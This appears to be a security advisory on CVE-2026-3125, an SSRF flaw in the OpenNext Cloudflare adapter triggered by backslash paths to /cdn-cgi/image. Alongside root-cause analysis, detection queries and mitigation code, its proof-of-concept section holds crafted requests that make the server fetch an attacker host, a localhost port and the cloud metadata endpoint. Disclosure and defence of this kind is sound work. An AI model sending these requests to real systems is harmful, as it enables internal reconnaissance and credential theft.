CVE-2026-3125: Cloudflare OpenNext Path Normalization Flaw Enables High-Risk SSRF Attacks on Next.js Deployments

CVE-2026-3125 — SSRF via Path Normalization Bypass in @opennextjs/cloudflare

CVE ID: CVE-2026-3125
Vulnerability Type: Server-Side Request Forgery (SSRF)
Affected Component: @opennextjs/cloudflare (OpenNext adapter used for deploying Next.js applications on Cloudflare Workers)
Severity: High
CVSS Score: 7.7 (CVSS v3.1)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality Impact: High
Integrity Impact: Low
Availability Impact: Low
Exploitability: High
Exploit Availability: Public exploitation techniques are possible using crafted HTTP requests (should only be used for security testing and educational purposes)


Overview

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the @opennextjs/cloudflare package used to run Next.js applications on Cloudflare infrastructure. The vulnerability arises due to inconsistent handling of URL paths between the Cloudflare edge layer and the JavaScript runtime executing inside Cloudflare Workers.

Certain internal routes used by Cloudflare, particularly those under the /cdn-cgi/ namespace, are expected to be intercepted by the Cloudflare edge network before requests reach the application runtime. These routes typically handle internal services such as image optimization or platform-level operations and are not intended to be processed by application code.

However, it was observed that when a backslash (\) character is used instead of a forward slash (/) in the URL path, the request may bypass the edge routing filter. The request is then forwarded to the Worker runtime where JavaScript URL parsing normalizes the backslash into a forward slash.

Because of this normalization behavior, the request is interpreted as a legitimate /cdn-cgi/image request by the application handler. Once this occurs, the worker logic may perform a server-side fetch operation to an attacker-controlled URL without properly validating the target address.

As a result, the application can be abused as a proxy capable of sending requests to internal resources or arbitrary external endpoints. This behavior creates a Server-Side Request Forgery condition.


Affected Products

The vulnerability affects deployments that rely on the Cloudflare adapter provided by OpenNext.

Affected component:

@opennextjs/cloudflare

Applications that are most likely impacted include:

  • Next.js applications deployed using OpenNext
  • Applications running on Cloudflare Workers through the OpenNext adapter
  • Deployments where the /cdn-cgi/image endpoint is reachable through application routing
  • Systems where outbound HTTP requests are not restricted

Older versions of the adapter did not enforce sufficient validation on the URLs being fetched.


Root Cause Analysis

The root cause lies in path normalization differences between two layers of request processing.

Cloudflare Edge Layer

The Cloudflare edge routing system is responsible for intercepting specific internal paths before the request reaches application logic. This filtering relies on strict matching rules and expects paths to contain forward slashes (/).

When a request is received containing a backslash (\) instead of a forward slash, the edge layer fails to recognize the path as a protected endpoint.

Worker Runtime

Once the request reaches the Worker runtime, the JavaScript URL parser processes the request path. The parser automatically normalizes the path by converting backslashes into forward slashes.

This behavior causes a path such as:

/cdn-cgi\image

to be interpreted internally as:

/cdn-cgi/image

The request is therefore processed by the image proxy handler that performs outbound HTTP requests.

Because URL validation was insufficient, the application could be forced to retrieve resources from attacker-controlled destinations.
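The mismatch between the two layers, as an added example that is not part of this advisory or of the OpenNext code base: it models the edge filter as a strict string match on the raw request-target and the Worker route matcher as a check on the WHATWG-parsed pathname (the parser used by Workers and Node.js). The host app.example and the sample requests are constructed.

```javascript
// Constructed model of the two request-processing layers described above.
const PROTECTED_PREFIX = "/cdn-cgi/";

// Edge layer model: exact string matching on the raw request-target.
function edgeIntercepts(rawPath) {
  return rawPath.startsWith(PROTECTED_PREFIX);
}

// Worker layer model: the WHATWG URL parser treats "\" as "/" in the path of
// http(s) URLs, so the route matcher sees "/cdn-cgi/image" either way.
function workerRoute(rawRequestUrl) {
  const url = new URL(rawRequestUrl);
  if (url.pathname.startsWith("/cdn-cgi/image")) {
    return { handler: "image-proxy", target: url.searchParams.get("url") };
  }
  return { handler: "app", target: null };
}

// Run one request through both layers and report what each one saw.
function trace(rawPath, query) {
  const rawUrl = "https://app.example" + rawPath + (query ? "?" + query : "");
  return {
    normalizedPath: new URL(rawUrl).pathname,
    edgeIntercepts: edgeIntercepts(rawPath),
    worker: workerRoute(rawUrl),
  };
}

// Constructed sample requests: the forward-slash form is caught at the edge,
// the backslash form slips past it and still lands in the image handler.
const normal = trace("/cdn-cgi/image", "url=http://example.test/a.png");
const bypass = trace("/cdn-cgi\\image", "url=http://example.test/a.png");
console.log(normal, bypass);
```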


Attack Scenario

The attack does not require authentication and can be performed remotely by sending a specially crafted HTTP request.

A typical exploitation chain may follow these steps:

  1. A vulnerable Next.js application deployed with OpenNext is identified.
  2. A crafted request containing a backslash path is sent to bypass edge filtering.
  3. The request reaches the Worker runtime where the path is normalized.
  4. The image proxy handler executes and attempts to fetch the specified URL.
  5. The attacker gains the ability to force outbound HTTP requests from the server.

This behavior may be abused for internal reconnaissance or access to restricted resources.


Potential Impact

If exploited successfully, the following impacts may occur:

Internal Network Discovery

Requests may be directed to internal addresses that are not normally reachable from the internet. This allows an attacker to identify internal services and infrastructure.

Access to Metadata Services

Cloud environments frequently expose metadata endpoints that provide information about the running instance. If reachable, sensitive configuration data or temporary credentials could be retrieved.

Exposure of Private Assets

Some Next.js deployments store incremental build artifacts or cached resources within internal directories. These resources may become accessible through crafted requests.

Proxy Abuse

The application server may be used as a relay to send requests to external targets, potentially assisting in further attacks or scanning activities.


Proof of Concept (Educational Use Only)

The following examples demonstrate how the vulnerability may be triggered using crafted HTTP requests. They are provided strictly for defensive research and security testing.

Basic SSRF Trigger

GET /cdn-cgi\image?url=http://attacker.example/test HTTP/1.1
Host: vulnerable-site.com

Internal Service Probe

GET /cdn-cgi\image?url=http://127.0.0.1:8080 HTTP/1.1
Host: vulnerable-site.com

Metadata Endpoint Attempt

GET /cdn-cgi\image?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: vulnerable-site.com

If the application attempts to retrieve these URLs, SSRF behavior is confirmed.


Indicators of Compromise

The following indicators may suggest exploitation attempts:

  • HTTP requests containing backslashes within URL paths
  • Access attempts targeting /cdn-cgi endpoints with unusual formatting
  • Worker logs showing outbound requests to internal IP ranges
  • Repeated requests attempting to fetch remote resources through image proxy parameters
  • Requests referencing metadata service IP addresses

Detection

Detection can be performed by analyzing web server logs, Cloudflare request logs, and application logs.

Particular attention should be given to request paths containing backslashes or encoded path manipulation characters.

Suspicious parameters referencing external URLs should also be investigated.


Detection Rules

Splunk Query

index=web_logs
| search uri_path="*\\cdn-cgi*"
| stats count by src_ip, uri_path, user_agent
| sort -count

Elastic / Kibana Query

url.path:*\\cdn-cgi*

Microsoft Sentinel (KQL)

CommonSecurityLog
| where RequestURL contains "\\cdn-cgi"
| summarize count() by SourceIP, RequestURL
| order by count_ desc

Generic Web Log Detection

-- Backslash escaping depends on the SQL dialect: in MySQL with default settings the
-- backslash is stripped once by the parser and once by LIKE, so the pattern must be
-- written as '%\\\\cdn-cgi%'; adjust likewise for the engine behind your log store.
request_uri LIKE '%\cdn-cgi%'
OR request_uri LIKE '%\image%'

Internal SSRF Destination Detection

destination_ip IN (
127.0.0.1,
10.0.0.0/8,
172.16.0.0/12,
192.168.0.0/16,
169.254.169.254
)

This pseudo-query lists the destinations to watch for; CIDR matching has to be written with the platform's own function (for example cidrmatch() in Splunk or ipv4_is_in_range() in KQL). Outbound requests from the Worker to any of these ranges indicate an attempt to reach internal network resources.


Log Sources

The following log sources are valuable when investigating this vulnerability:

  • Cloudflare HTTP request logs
  • Cloudflare Worker execution logs
  • Application access logs
  • Reverse proxy logs
  • Network firewall logs
  • Outbound network monitoring systems
  • Web Application Firewall logs

Combining multiple log sources provides better visibility into exploitation attempts.


MITRE ATT&CK Mapping

Technique                           ID      Description
Exploit Public-Facing Application   T1190   Exploiting vulnerable web applications
Network Service Discovery           T1046   Probing internal network services
Data from Cloud Service             T1530   Accessing metadata or cloud resources
Exfiltration Over Web Protocol      T1041   Retrieving sensitive information through HTTP

Mitigation

Until systems are updated, the following defensive actions are recommended:

  • Reject requests containing backslashes in URL paths.
  • Restrict outbound network access from application runtimes.
  • Validate URLs before performing server-side fetch operations.
  • Block access to internal metadata IP ranges.
  • Monitor and alert on unusual /cdn-cgi request patterns.
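A request guard that implements these points for an image-proxy handler, as an added example that is not OpenNext's own code. It assumes the handler receives the raw request URL string and an allow-list of image hosts; it checks IPv4 literals against private, loopback and link-local ranges and rejects IPv6 literals outright.

```javascript
// Constructed guard for a server-side image fetch. Not the project's patch.
const PRIVATE_V4 = [                // [network, prefix length]
  ["10.0.0.0", 8], ["172.16.0.0", 12], ["192.168.0.0", 16], ["0.0.0.0", 8],
  ["127.0.0.0", 8],                 // loopback
  ["169.254.0.0", 16],              // link-local, covers the 169.254.169.254 metadata address
];

function ipv4ToInt(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const o = m.slice(1).map(Number);
  if (o.some((x) => x > 255)) return null;
  return ((o[0] << 24) | (o[1] << 16) | (o[2] << 8) | o[3]) >>> 0;
}

function isPrivateIPv4(host) {
  const ip = ipv4ToInt(host);
  if (ip === null) return false;
  return PRIVATE_V4.some(([net, bits]) => {
    const mask = (0xffffffff << (32 - bits)) >>> 0;
    return ((ip & mask) >>> 0) === ((ipv4ToInt(net) & mask) >>> 0);
  });
}

// Returns { ok: true, target } or { ok: false, reason }.
function checkImageRequest(rawRequestUrl, allowedHosts) {
  // 1. Reject on the raw string, before any parser can normalize it:
  //    a backslash (or its %5C encoding) never belongs in a request path.
  const rawPath = rawRequestUrl.split("?")[0];
  if (rawPath.includes("\\") || /%5c/i.test(rawPath)) {
    return { ok: false, reason: "backslash in request path" };
  }
  const target = new URL(rawRequestUrl).searchParams.get("url");
  if (!target) return { ok: false, reason: "missing url parameter" };
  let t;
  try { t = new URL(target); } catch { return { ok: false, reason: "unparseable url" }; }
  // 2. Only plain HTTP(S) fetches.
  if (t.protocol !== "http:" && t.protocol !== "https:") {
    return { ok: false, reason: "disallowed scheme" };
  }
  // 3. The URL parser canonicalizes IPv4 literals (0x7f000001, 2130706433, ...)
  //    to dotted quads, so the range check sees the real address.
  const host = t.hostname;
  if (host === "localhost" || host.startsWith("[") || isPrivateIPv4(host)) {
    return { ok: false, reason: "internal destination" };
  }
  // 4. Allow-list of image origins; this also covers DNS names that resolve
  //    to internal addresses, which a literal-IP check alone cannot catch.
  if (!allowedHosts.includes(host)) return { ok: false, reason: "host not allow-listed" };
  return { ok: true, target: t.href };
}
```

Call checkImageRequest() before any fetch() in the handler and return a 400 on `ok: false`; the reason string is also a useful field to log for the detection rules above.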

Patch / Upgrade

The vulnerability has been addressed in newer releases of the Cloudflare adapter.

Upgrading to the patched version is strongly recommended.

Official patch information:

https://developers.cloudflare.com/changelog/post/2025-06-17-open-next-ssrf

Patched versions include improved URL validation and additional protections preventing unsafe outbound requests.


Aegiron
